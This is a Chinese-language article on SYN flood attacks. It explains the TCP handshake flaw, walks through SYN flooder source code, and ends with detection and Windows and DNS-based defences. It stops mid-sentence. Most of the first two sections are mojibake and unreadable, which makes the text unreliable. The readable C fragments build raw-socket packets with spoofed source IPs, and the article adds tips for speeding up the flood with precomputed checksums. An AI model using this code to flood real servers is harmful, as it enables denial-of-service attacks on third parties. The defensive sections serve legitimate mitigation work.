SYN Flood 攻擊的基本原理及防禦


作者：shotgun
²Ä¤@³¡¤À SYN Floodªº°ò¥»­ì²z SYN Flood¬O·í«e³Ì¬y¦æªºDoS¡]©Úµ´ªA°È§ðÀ»¡^»PDDoS¡]¤À´²¦¡©Úµ´ªA°È§ðÀ»¡^ªº¤è¦¡¤§ ¤@¡A³o¬O¤@ºØ§Q¥ÎTCP¨óij¯Ê³´¡Aµo°e¤j¶q°°³yªºTCP³s±µ½Ð¨D¡A±q¦Ó¨Ï±o³Q§ðÀ»¤è¸ê·½¯Ó ºÉ¡]CPUº¡­t²ü©Î°O¾ÐÅ餣¨¬¡^ªº§ðÀ»¤è¦¡¡C ­n©ú¥Õ³oºØ§ðÀ»ªº°ò¥»­ì²z¡AÁÙ¬O­n±qTCP³s±µ«Ø¥ßªº¹Lµ{¶}©l»¡°_¡G ¤j®a³£ª¾¹D¡ATCP»PUDP¤£¦P¡A¥¦¬O°ò©ó³s±µªº¡A¤]´N¬O»¡¡G¬°¤F¦bªA°ÈºÝ©M¥Î¤áºÝ¤§¶¡¶Ç °eTCP¸ê®Æ¡A¥²¶·¥ý«Ø¥ß¤@­ÓµêÀÀ¹q¸ô¡A¤]´N¬OTCP³s±µ¡A«Ø¥ßTCP³s±µªº¼Ð·Ç¹Lµ{¬O³o¼Ëªº ¡G ­º¥ý¡A½Ð¨DºÝ¡]¥Î¤áºÝ¡^µo°e¤@­Ó¥]§tSYN¼Ð»xªºTCP³ø¤å¡ASYN§Y¦P¨B¡]Synchronize¡^¡A ¦P¨B³ø¤å·|«ü©ú¥Î¤áºÝ¨Ï¥Îªº°ð¥H¤ÎTCP³s±µªºªì©l§Ç¸¹¡F ²Ä¤G¨B¡A¦øªA¾¹¦b¦¬¨ì¥Î¤áºÝªºSYN³ø¤å«á¡A±Nªð¦^¤@­ÓSYN+ACKªº³ø¤å¡Aªí¥Ü¥Î¤áºÝªº½Ð ¨D³Q±µ¨ü¡A¦P®ÉTCP§Ç¸¹³Q¥[¤@¡AACK§Y½T»{¡]Acknowledgement¡^¡C ²Ä¤T¨B¡A¥Î¤áºÝ¤]ªð¦^¤@­Ó½T»{³ø¤åACKµ¹¦øªA¾¹ºÝ¡A¦P¼ËTCP§Ç¦C¸¹³Q¥[¤@¡A¨ì¦¹¤@­ÓTCP ³s±µ§¹¦¨¡C ¥H¤Wªº³s±µ¹Lµ{¦bTCP¨óij¤¤³QºÙ¬°¤T¦¸´¤¤â¡]Three-way Handshake¡^¡C °ÝÃD´N¥X¦bTCP³s±µªº¤T¦¸´¤¤â¤¤¡A°²³]¤@­Ó¥Î¤á¦V¦øªA¾¹µo°e¤FSYN³ø¤å«á¬ðµM¦º¾÷©Î±¼ ½u¡A¨º»ò¦øªA¾¹¦bµo¥XSYN+ACKÀ³µª³ø¤å«á¬OµLªk¦¬¨ì¥Î¤áºÝªºACK³ø¤åªº¡]²Ä¤T¦¸´¤¤âµL ªk§¹¦¨¡^¡A³oºØ±¡ªp¤U¦øªA¾¹ºÝ¤@¯ë·|­«¸Õ¡]¦A¦¸µo°eSYN+ACKµ¹¥Î¤áºÝ¡^¨Ãµ¥«Ý¤@¬q®É ¶¡«á¥á±ó³o­Ó¥¼§¹¦¨ªº³s±µ¡A³o¬q®É¶¡ªºªø«×§Ú­ÌºÙ¬°SYN Timeout¡A¤@¯ë¨Ó»¡³o­Ó®É¶¡ ¬O¤ÀÄÁªº¼Æ¶q¯Å¡]¤j¬ù¬°30¬í-2¤ÀÄÁ¡^¡F¤@­Ó¥Î¤á¥X²{²§±`¾É­P¦øªA¾¹ªº¤@­Ó½uµ{µ¥«Ý1 ¤ÀÄÁ¨Ã¤£¬O¤°»ò«Ü¤jªº°ÝÃD¡A¦ý¦pªG¦³¤@­Ó´c·Nªº§ðÀ»ªÌ¤j¶qÃþ¤ñ³oºØ±¡ªp¡A¦øªA¾¹ºÝ±N ¬°¤FºûÅ@¤@­Ó«D±`¤jªº¥b³s±µ¦Cªí¦Ó®ø¯Ó«D±`¦hªº¸ê·½---- ¼Æ¥H¸U­pªº¥b³s±µ¡A§Y¨Ï¬O²³æªº«O¦s¨Ã¹M¾ä¤]·|®ø¯Ó«D±`¦hªºCPU®É¶¡©M°O¾ÐÅé ¡A¦óªpÁÙ­n¤£Â_¹ï³o­Ó¦Cªí¤¤ªºIP¶i¦æSYN+ACKªº­«¸Õ¡C¹ê»Ú¤W¦pªG¦øªA¾¹ªºTCP/IP´Ì¤£ °÷±j¤j¡A³Ì«áªºµ²ªG©¹©¹¬O°ïÅ|·¸¦ì±Y¼ì---§Y¨Ï¦øªA¾¹ºÝªº¨t²Î¨¬°÷±j¤j¡A¦øªA¾¹ºÝ¤] ±N¦£©ó³B²z§ðÀ»ªÌ°°³yªºTCP³s±µ½Ð¨D¦ÓµL·v²z¸B«È¤áªº¥¿±`½Ð¨D¡]²¦³º¥Î¤áºÝªº¥¿±`½Ð ¨D¤ñ²v«D±`¤§¤p¡^¡A¦¹®É±q¥¿±`«È¤áªº¨¤«×¬Ý¨Ó¡A¦øªA¾¹¥¢¥hÅTÀ³¡A³oºØ±¡ªp§Ú­ÌºÙ§@¡G ¦øªA¾¹ºÝ¨ü¨ì¤FSYN Flood§ðÀ»¡]SYN¬x¤ô§ðÀ»¡^¡C ±q¨¾¿m¨¤«×¨Ó»¡¡A¦³´XºØ²³æªº¸Ñ¨M¤èªk¡A²Ä¤@ºØ¬OÁYµuSYN Timeout®É¶¡¡A¥Ñ©óSYN Flood§ðÀ»ªº®ÄªG¨ú¨M©ó¦øªA¾¹¤W«O«ùªºSYN¥b³s±µ¼Æ¡A³o­Ó­È=SYN§ðÀ»ªºÀW«× x SYN 
Timeout¡A©Ò¥H³q¹LÁYµu±q±µ¦¬¨ìSYN³ø¤å¨ì½T©w³o­Ó³ø¤åµL®Ä¨Ã¥á±ó§ï³s±µªº®É¶¡¡A¨Ò¦p ³]¸m¬°20¬í¥H¤U¡]¹L§CªºSYN Timeout³]¸m¥i¯à·|¼vÅT«È¤áªº¥¿±`³X°Ý¡^¡A¥i¥H¦¨­¿ªº­° §C¦øªA¾¹ªº­t²ü¡C ²Ä¤GºØ¤èªk¬O³]¸mSYN Cookie¡A´N¬Oµ¹¨C¤@­Ó½Ð¨D³s±µªºIP¦ì§}¤À°t¤@­ÓCookie¡A¦pªGµu ®É¶¡¤º³sÄò¨ü¨ì¬Y­ÓIPªº­«½ÆSYN³ø¤å¡A´N»{©w¬O¨ü¨ì¤F§ðÀ»¡A¥H«á±q³o­ÓIP¦a§}¨Óªº¥] ·|³Q¤@·§¥á±ó¡C ¥i¬O¤W­zªº¨âºØ¤èªk¥u¯à¹ï¥I¤ñ¸û­ì©lªºSYN Flood§ðÀ»¡AÁYµuSYN Timeout®É¶¡¶È¦b¹ï¤è §ðÀ»ÀW«×¤£°ªªº±¡ªp¤U¥Í®Ä¡ASYN Cookie§ó¨Ì¿à¤_¹ï¤è¨Ï¥Î¯u¹êªºIP¦ì§}¡A¦pªG§ðÀ»ªÌ¥H ¼Æ¸U/¬íªº³t«×µo°eSYN³ø¤å¡A¦P®É§Q¥ÎSOCK_RAWÀH¾÷§ï¼gIP³ø¤å¤¤ªº·½¦ì§}¡A¥H¤Wªº¤èªk ±N²@µL¥ÎªZ¤§¦a¡C ²Ä¤G³¡¥÷ SYN Flooder·½½X¸ÑŪ ¤U­±§Ú­Ì¨Ó¤ÀªRSYN Flooderªºµ{¦¡¹ê²{¡C ­º¥ý¡A§Ú­Ì¨Ó¬Ý¤@¤UTCP³ø¤åªº®æ¦¡¡G 0 1 2 3 4 5 6 0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | ¢×¢Þ­º³¡ | ¢â¢Ñ¢Þ­º³¡ | ¢â¢Ñ¢Þ¸ê®Æ¬q¡@¡@ | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ ¹Ï¤@ TCP³ø¤åµ²ºc ¦p¤W¹Ï©Ò¥Ü¡A¤@­ÓTCP³ø¤å¥Ñ¤T­Ó³¡¤Àºc¦¨¡G20¦ì¤¸²ÕªºIP­º³¡¡B20¦ì¤¸²ÕªºTCP­º³¡»P¤£ ©wªøªº¸ê®Æ¬q¡A¡]¹ê»Ú¾Þ§@®É¥i¯à·|¦³¥i¿ïªºIP¿ï¶µ¡A³oºØ±¡ªp¤UTCP­º³¡¦V«á¶¶©µ¡^¥Ñ ©ó§Ú­Ì¥u¬Oµo°e¤@­ÓSYN«H¸¹¡A¨Ã¤£¶Ç»¼¥ô¦ó¸ê®Æ¡A©Ò¥HTCP¸ê®Æ¬q¬°ªÅ¡CTCP­º³¡ªº¸ê®Æ µ²ºc¬°¡G 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- | ¤Q¤»¦ì·½°ð¸¹ | ¤Q¤»¦ì¤¸¥Ø¼Ð°ð¸¹ | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- | ¤T¤Q¤G¦ì§Ç¦C¸¹ | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- | ¤T¤Q¤G¦ì½T»{¸¹ | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- | ¥|¦ì | |U|A|P|R|S|F| | | ­º³¡ |¤»¦ì«O¯d¦ì¤¸ |R|C|S|S|Y|I| ¤Q¤»¦ì¤¸µ¡¤f¤j¤p | | ªø«× | |G|K|H|T|N|N| | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- | ¤Q¤»¦ì®ÕÅç©M | ¤Q¤»¦ìºò«æ«ü°w | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- | ¿ï¶µ¡]­Y¦³¡^ | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- | ¼Æ¾Ú¡]­Y¦³¡^ | 
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- ¹Ï¤G TCP­º³¡µ²ºc ®Ú¾ÚTCP³ø¤å®æ¦¡¡A§Ú­Ì©w¸q¤@­Óµ²ºcTCP_HEADER¥Î¨Ó¦s©ñTCP­º³¡¡G typedef struct _tcphdr { USHORT th_sport; //16¦ì·½°ð USHORT th_dport; //16¦ì¤¸¥Øªº°ð unsigned int th_seq; //32¦ì§Ç¦C¸¹ unsigned int th_ack; //32¦ì½T»{¸¹ unsigned char th_lenres; //4¦ì­º³¡ªø«×+6¦ì«O¯d¦r¤¤ªº4¦ì unsigned char th_flag; //2¦ì¤¸«O¯d¦r+6¦ì¤¸¼Ð»x¦ì¤¸ USHORT th_win; //16¦ì¤¸µ¡¤f¤j¤p USHORT th_sum; //16¦ì®ÕÅç©M USHORT th_urp; //16¦ì¤¸ºò«æ¸ê®Æ°¾²¾¶q }TCP_HEADER; ³q¹L¥H¥¿½Tªº¸ê®Æ¶ñ¥R³o­Óµ²ºc¨Ã±NTCP_HEADER.th_flag½á­È¬°2¡]¤G¶i¦ìªº00000010¡^ §Ú­Ì¯à»s³y¤@­ÓSYNªºTCP³ø¤å¡A³q¹L¤j¶qµo°e³o­Ó³ø¤å¥i¥H¹ê²{SYN Floodªº®ÄªG¡C¦ý¬O ¬°¤F¶i¦æIP´ÛÄF±q¦ÓÁôÂæۤv¡A¤]¬°¤F¸úÁצøªA¾¹ªºSYN CookieÀˬd¡AÁٻݭnª½±µ¹ïIP­º ³¡¶i¦æ¾Þ§@¡G 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- | ª©¥» | ªø«× | ¤K¦ìªA°ÈÃþ«¬| ¤Q¤»¦ìÁ`ªø«× | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- | ¤Q¤»¦ì¤¸¼ÐÃÑ | ¼Ð»x| ¤Q¤T¦ì¤¸¤ù°¾²¾¡@¡@ | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- | ¤K¦ì¤¸¥Í¦s®É¶¡ | ¤K¦ì¤¸¨óij | ¤Q¤»¦ì¤¸­º³¡®ÕÅç©M| +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | ¤T¤Q¤G¦ì·½¢×¢Þ¦a§} | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | ¤T¤Q¤G¦ì¤¸¥Øªº¢×¢Þ¦ì§} | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | ¿ï¶µ¡]­Y¦³¡^ | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | ¡@¡@¼Æ¾Ú¡@¡@ | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ ¹Ï¤T IP­º³¡µ²ºc ¦P¼Ë©w¸q¤@­ÓIP_HEADER¨Ó¦s©ñIP­º³¡ typedef struct _iphdr { unsigned char h_verlen; //4¦ì­º³¡ªø«×+4¦ìIPª©¥»¸¹ unsigned char tos; //8¦ìªA°ÈÃþ«¬TOS unsigned short total_len; //16¦ì¤¸Á`ªø«×¡]¦ì¤¸²Õ¡^ unsigned short ident; //16¦ì¤¸¼ÐÃÑ unsigned short frag_and_flags; //3¦ì¤¸¼Ð»x¦ì¤¸ unsigned char ttl; //8¦ì¥Í¦s®É¶¡ TTL unsigned char proto; //8¦ì¤¸¨óij¸¹(TCP, UDP ©Î¨ä¥L) unsigned short checksum; //16¦ìIP­º³¡®ÕÅç©M unsigned int sourceIP; //32¦ì·½IP¦a§} 
unsigned int destIP; //32¦ì¤¸¥ØªºIP¦ì§} }IP_HEADER; µM«á³q¹LSockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_ OVERLAPPED)); «Ø¥ß¤@­Ó­ì©l®M¤¶­±¡A¥Ñ©ó§Ú­ÌªºIP·½¦ì§}¬O°°³yªº¡A©Ò¥H¤£¯à«ü±æ¨t²ÎÀ°§Ú­Ì­pºâIP®Õ Åç©M¡A§Ú­Ì±o¦b¦bsetsockopt¤¤³]¸mIP_HDRINCL§i¶D¨t²Î¦Û¤v¶ñ¥RIP­º³¡¨Ã¦Û¤v­pºâ®ÕÅç©M ¡G flag=TRUE; setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int)); IP®ÕÅç©Mªº­pºâ¤èªk¬O¡G­º¥ý±NIP­º³¡ªº®ÕÅç©MÄæ¦ì³]¬°0¡]IP_HEADER.checksum=0¡^,µM «á­pºâ¾ã­ÓIP­º³¡¡]¥]¬A¿ï¶µ¡^ªº¤G¶i¦ì¤Ï½Xªº©M¡A¤@­Ó¼Ð·Çªº®ÕÅç©M¨ç¼Æ¦p¤U©Ò¥Ü¡G USHORT checksum(USHORT *buffer, int size) { unsigned long cksum=0; while(size >1) { cksum+=*buffer++; size -=sizeof(USHORT); } if(size ) cksum += *(UCHAR*)buffer; cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (USHORT)(~cksum); } ³o­Ó¨ç¼Æ¨Ã¨S¦³¸g¹L¥ô¦óªºÀu¤Æ¡A¥Ñ©ó®ÕÅç©M¨ç¼Æ¬OTCP/IP¨ó©w¤¤³Q½Õ¥Î³Ì¦h¨ç¼Æ¤§¤@¡A ©Ò¥H¤@¯ë»¡¨Ó¡A¦b¹ê²{TCP/IP´Ì®É¡A·|®Ú¾Ú§@·~¨t²Î¹ï®ÕÅç©M¨ç¼Æ¶i¦æÀu¤Æ¡C TCP­º³¡®Ö¹ïÁ`©M»PIP­º³¡®ÕÅç©Mªº­pºâ¤èªk¬Û¦P¡A¦bµ{¦¡¤¤¨Ï¥Î¦P¤@­Ó¨ç¼Æ¨Ó­pºâ¡C »Ý­nª`·Nªº¬O¡A¥Ñ©óTCP­º³¡¤¤¤£¥]§t·½¦ì§}»P¥Ø¼Ð¦ì§}µ¥¸ê°T¡A¬°¤F«OÃÒTCP®ÕÅ窺¦³®Ä ©Ê¡A¦b¶i¦æTCP®ÕÅç©Mªº­pºâ®É¡A»Ý­n¼W¥[¤@­ÓTCP°°­º³¡ªº®ÕÅç©M¡A©w¸q¦p¤U¡G struct { unsigned long saddr; //·½¦a§} unsigned long daddr; //¥Øªº¦a§} char mbz; //¸mªÅ char ptcl; //¨óijÃþ«¬ unsigned short tcpl; //TCPªø«× }psd_header; µM«á§Ú­Ì±N³o¨â­ÓÄæ¦ì½Æ»s¨ì¦P¤@­Ó½w½Ä°ÏSendBuf¤¤¨Ã­pºâTCP®ÕÅç©M¡G memcpy(SendBuf,&psd_header,sizeof(psd_header)); memcpy(SendBuf+sizeof(psd_header),&tcp_header,sizeof(tcp_header)); tcp_header.th_sum=checksum((USHORT *)SendBuf,sizeof(psd_header)+sizeof(tcp_ header)); ­pºâIP®ÕÅç©Mªº®É­Ô¤£»Ý­n¥]¬ATCP°°­º³¡¡G memcpy(SendBuf,&ip_header,sizeof(ip_header)); memcpy(SendBuf+sizeof(ip_header),&tcp_header,sizeof(tcp_header)); ip_header.checksum=checksum((USHORT *)SendBuf, sizeof(ip_header)+sizeof(tcp_ header)); ¦A±N­pºâ¹L®ÕÅç©MªºIP­º³¡»PTCP­º³¡½Æ»s¨ì¦P¤@­Ó½w½Ä°Ï¤¤´N¥i¥Hª½±µµo°e¤F¡G memcpy(SendBuf,&ip_header,sizeof(ip_header)); sendto(SockRaw,SendBuf,datasize,0,(struct sockaddr*) 
&DestAddr,sizeof(DestAddr)); ¦]¬°¾ã­ÓTCP³ø¤å¤¤ªº©Ò¦³³¡¤À³£¬O§Ú­Ì¦Û¤v¼g¤Jªº¡]§@·~¨t²Î¤£·|°µ¥ô¦ó¤z¯A¡^¡A©Ò¥H §Ú­Ì¥i¥H¦bIP­º³¡¤¤©ñ¸mÀH¾÷ªº·½IP¦a§}¡A¦pªG°°³yªº·½IP¦ì§}½T¹ê¦³¤H¨Ï¥Î¡A¥L¦b±µ¦¬ ¨ì¦øªA¾¹ªºSYN+ACK³ø¤å«á·|µo°e¤@­ÓRST³ø¤å¡]¼Ð»x¦ì¤¸¬°00000100¡^¡A³qª¾¦øªA¾¹ºÝ¤£ »Ý­nµ¥«Ý¤@­ÓµL®Äªº³s±µ¡A¥i¬O¦pªG³o­Ó°°³yIP¨Ã¨S¦³¸j©w¦b¥ô¦óªº¥D¾÷¤W¡A¤£·|¦³¥ô¦ó ³]³Æ¥h³qª¾¥D¾÷¸Ó³s±µ¬OµL®Äªº¡]³o¥¿¬OTCP¨ó©wªº¯Ê³´¡^¡A¥D¾÷±N¤£Â_­«¸Õª½¨ìSYN Timeout®É¶¡«á¤~¯à¥á±ó³o­ÓµL®Äªº¥b³s±µ¡C©Ò¥H·í§ðÀ»ªÌ¨Ï¥Î¥D¾÷¤À§G«Üµ}²¨ªºIP¦ì§} ¬q¶i¦æ°°¸ËIPªºSYN Flood§ðÀ»®É¡A¦øªA¾¹¥D¾÷©Ó¨üªº­t²ü·|¬Û·íªº°ª¡A ®Ú¾Ú´ú¸Õ¡A¤@¥xPIII 550MHz+128MB+100Mbpsªº¾÷¾¹¨Ï¥Î¸g¹Lªì¨BÀu¤Æªº SYN Flooderµ{¦¡ ¥i¥H¥H16,000¥]/¬íªº³t«×µo°eTCP SYN³ø¤å¡A³o¼Ëªº§ðÀ»¤O¤w¸g¨¬¥H©ì«±¤j³¡¤ÀWEB¦øªA¾¹ ¤F¡C µy·L°Ê°Ê¸£µ¬§Ú­Ì´N·|µo²{¡A·Q¹ïSYN Flooderµ{¦¡¶i¦æÀu¤Æ¬O«Ü²³æªº¡A±qµ{¦¡ºc¬[¨Ó ¬Ý¡A§ðÀ»®É°j°é¤ºªº¥N½X¥D­n¬O¶i¦æ®ÕÅç©M­pºâ»P½w½Ä°Ïªº¶ñ¥R¡A¤@¯ëªº«ä¸ô¬O´£°ª®ÕÅç ©M­pºâªº³t«×¡A§Ú¬Æ¦Ü¨£¹L¥Î·J½s¥N½X½s¼gªº®ÕÅç©M¨ç¼Æ¡A¹ê»Ú¤W¡A¦³¥t¥~¤@­ÓÅܳqªº¤è ªk¥i¥H»´ÃP¹ê²{Àu¤Æ¦Ó¤S¤£»Ý­n°ª²`ªº½sµ{§Þ¥©©M¼Æ¾Çª¾ÃÑ¡A¡]¦Ñ¹ê»¡§a¡A§Ú¼Æ¾Ç¤ñ¸û®t :P¡^¡A§Ú­Ì¥J²Ó¬ã¨s¤F¨â­Ó¤£¦P·½¦a§}ªºTCP SYN³ø¤å«áµo²{¡A¨â­Ó³ø¤åªº¤j³¡¤ÀÄæ¦ì¬Û ¦P¡]¤ñ¦p¥Øªº¦a§}¡B¨óijµ¥µ¥¡^¡A¥u¦³·½¦ì§}©M®ÕÅç©M¤£¦P¡]¦pªG¬°¤FÁô½ª¡A·½°ð¤]¥i¥H ¦³ÅܤơA¦ý¬O¨Ã¤£¼vÅT§Ú­ÌºtºâªkÀu¤Æªº«ä¸ô¡^¡A¦pªG§Ú­Ì¨Æ¥ý­pºâ¦n¤j¶qªº·½¦ì§}»P®ÕÅç ©Mªº¹ïÀ³Ãö«Yªí¡]¦pªG¨ä¥LªºÄæ¦ì¦³ÅܤƤ]¥i¥H¥[¤J³o­Óªí¡^¡Aµ¥­pºâ§¹²¦¤F§ðÀ»µ{¦¡´N ¥u»Ý­n³æ¯Âªº²Õ¦X½w½Ä°Ï¨Ãµo°e¡]¥Î«ü°w¨Óª½±µ¾Þ§@½w½Ä°Ïªº¯S©w¦ì¸m¡A±q¨Æ¥ý­pºâ¦nªº¹ï À³ Ãö«Yªí¤¤Åª¥X¸ê®Æ¡A´À´«½w½Ä°Ï¬ÛÀ³Äæ¦ì¡^¡A³oºØ²³æªº¤u§@§¹¥þ¨ú¨M©ó¨t²Îµo°eIP¥]ªº³t «×¡A »Pµ{¦¡ªº®Ä²v¨S¦³¥ô¦óÃö«Y¡A³o¼Ë¡A§Y¨Ï¬OCPU¥DÀW¸û§Cªº¥D¾÷¤]¯à§Ö³tªºµo°e¤j¶qTCP SYN §ðÀ»¥]¡C ¦pªG¦Ò¼{¨ì½w½Ä°Ï«÷±µªº®É¶¡¡A¬Æ¦Ü¥i¥H©w¸q¤@­Ó«Ü¤jªº½w½Ä°Ï°}¦C¡A¶ñ¥R§¹²¦«á¦Aµo°e ¡]ÂúÆNµ¹³oºØ¤èªk·Q¤F¤@­Ó«Ü¶K¤Áªº¤ñ³ë¡G ¤õ½b¬¶¸Ë¼uÁöµM«ÜºC¡A¦ý¬O¤@¥¹¬¶¼u¤W½£¤F¥H«á´N¥i¥H³sÄò²r¯P¦aµo®g¤F:¡^¡C ²Ä¤T³¡¤À SYN Flood§ðÀ»ªººÊ´ú»P¨¾¿mªì±´ ¹ï©óSYN Flood§ðÀ»¡A¥Ø«e©|¨S¦³«Ü¦nªººÊ´ú©M¨¾¿m¤èªk¡A¤£¹L¦pªG¨t²ÎºÞ²z­û¼ô±x§ðÀ» ¤èªk©M¨t²Î¬[ºc¡A³q¹L¤@¨t¦Cªº³]©w¡A¤]¯à±q¤@©wµ{«×¤W­°§C³Q§ðÀ»¨t²Îªº­t²ü¡A´î»´­t 
面的影響。（這正是我撰寫本文的主要目的） 一般來說，如果一個系統（或主機）負荷突然升高甚至失去回應，使用Netstat 命令能看到大量SYN_RCVD的半連接（數量>500或占總連接數的10%以上），可以認定，這個系統（或主機）遭到了SYN Flood攻擊。 遭到SYN Flood攻擊後，首先要做的是取證，通過Netstat -n -p tcp >resault.txt記錄目前所有TCP連接狀態是必要的，如果有嗅探器，或者TcpDump之類的工具，記錄TCP SYN報文的所有細節也有助於以後追查和防禦，需要記錄的欄位有：源位址、IP首部中的標識、TCP首部中的序列號、TTL值等，這些資訊雖然很可能是攻擊者偽造的，但是用來分析攻擊者的心理狀態和攻擊程式也不無幫助。特別是TTL值，如果大量的攻擊包似乎來自不同的IP但是TTL值卻相同，我們往往能推斷出攻擊者與我們之間的路由器距離，至少也可以通過過濾特定TTL值的報文降低被攻擊系統的負荷（在這種情況下TTL值與攻擊報文不同的用戶就可以恢復正常訪問）。 前面曾經提到可以通過縮短SYN Timeout時間和設置SYN Cookie來進行SYN攻擊保護，對於Win2000系統，還可以通過修改註冊表降低SYN Flood的危害，在註冊表中作如下改動： 首先，打開regedit，找到HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters 增加一個SynAttackProtect的鍵值，類型為REG_DWORD，取值範圍是0-2，這個值決定了系統受到SYN攻擊時採取的保護措施，包括減少系統SYN+ACK的重試的次數等，預設值是0（沒有任何保護措施），推薦設置是增加一個TcpMaxHalfOpen的鍵值，類型為REG_DWORD，取值範圍是100-0xFFFF，這個值是系統允許同時打開的半連接，默認情況下WIN2K PRO和SERVER是100， ADVANCED SERVER是 500，這個值很難確定，取決於伺服器TCP負荷的狀況和可能受到的攻擊強度， 具體的值需要經過試驗才能決定。 增加一個TcpMaxHalfOpenRetried的鍵值，類型為REG_DWORD，取值範圍是80-0xFFFF，默認情況下WIN2K PRO和SERVER是80，ADVANCED SERVER是400，這個值決定了在什麼情況下系統會打開SYN攻擊保護。 我們來分析一下Win2000的SYN攻擊保護機制：正常情況下，Win2K對TCP連接的三次握手有一個常規的設置，包括SYN Timeout時間、SYN-ACK的重試次數和SYN報文從路由器到系統再到Winsock的延時等，這個常規設置是針對系統性能進行優化的（安全和性能往往相互矛盾）所以可以給用戶提供方便快捷的服務；一旦伺服器受到攻擊，SYN半連接的數量超
過TcpMaxHalfOpenRetried的設置，系統會認為自己受到了SYN Flood攻擊，此時設置在SynAttackProtect鍵值中的選項開始作用，SYN Timeout時間被減短，SYN-ACK的重試次數減少，系統也會自動對緩衝區中的報文進行延時，避免對TCP/IP堆疊造成過大的衝擊，力圖將攻擊危害減到最低；如果攻擊強度不斷增大，超過了TcpMaxHalfOpen值，此時系統已經不能提供正常的服務了，更重要的是保證系統不會崩潰，所以系統將會丟棄任何超出TcpMaxHalfOpen值範圍的SYN報文（應該是使用隨機丟包策略），保證系統的穩定性。 所以，對於需要進行SYN攻擊保護的系統，我們可以測試/預測一下訪問峰值時期的半連接打開量，以其作為參考設定TcpMaxHalfOpenRetried的值（保留一定的餘量），然後再以TcpMaxHalfOpenRetried的1.25倍作為TcpMaxHalfOpen值，這樣可以最大限度地發揮WIN2K自身的SYN攻擊保護機制。 通過設置註冊表防禦SYN Flood攻擊，採用的是“挨打”的策略，無論系統如何強大，始終不能光靠挨打支撐下去，除了挨打之外，“退讓”也是一種比較有效的方法。 退讓策略是基於SYN Flood攻擊代碼的一個缺陷，我們重新來分析一下SYN Flood攻擊者的流程：SYN Flood程式有兩種攻擊方式，基於IP的和基於網域名稱的，前者是攻擊者自己進行網域名稱解析並將IP位址傳遞給攻擊程式，後者是攻擊程式自動進行網域名稱解析，但是它們有一點是相同的，就是一旦攻擊開始，將不會再進行網域名稱解析，我們的切入點正是這裏：假設一台伺服器在受到SYN Flood攻擊後迅速更換自己的IP位址，那麼攻擊者仍在不斷攻擊的只是一個空的IP位址，並沒有任何主機，而防禦方只要將DNS解析更改到新的IP位址就能在很短的時間內（取決於DNS的刷新時間）恢復用戶通過網域名稱進行的正常訪問。 為了迷惑攻擊者，我們甚至可以放置一台“犧牲”伺服器讓攻擊者滿足於攻擊的“效果”（由於DNS緩衝的原因，只要攻擊者的瀏覽器不重啟，他訪問的仍然是原先的IP位址）。 同樣的原因，在眾多的負載均衡架構中，基於DNS解析的負載均衡本身就擁有對SYN Flood的免疫力，基於DNS解析的負載均衡能將用戶的請求分配到不同IP的伺服器主機上，攻擊者攻擊的永遠只是其中一台伺服器，雖然說攻擊者也能不斷去進行DNS請求從而打破這種“退讓”策略，但是一來這樣增加了攻擊者的成本，二來過多的DNS請求可以幫助我們追查攻擊者的真正蹤跡（DNS請求不同於SYN攻擊，是需要返回資料的，所以很難進行IP
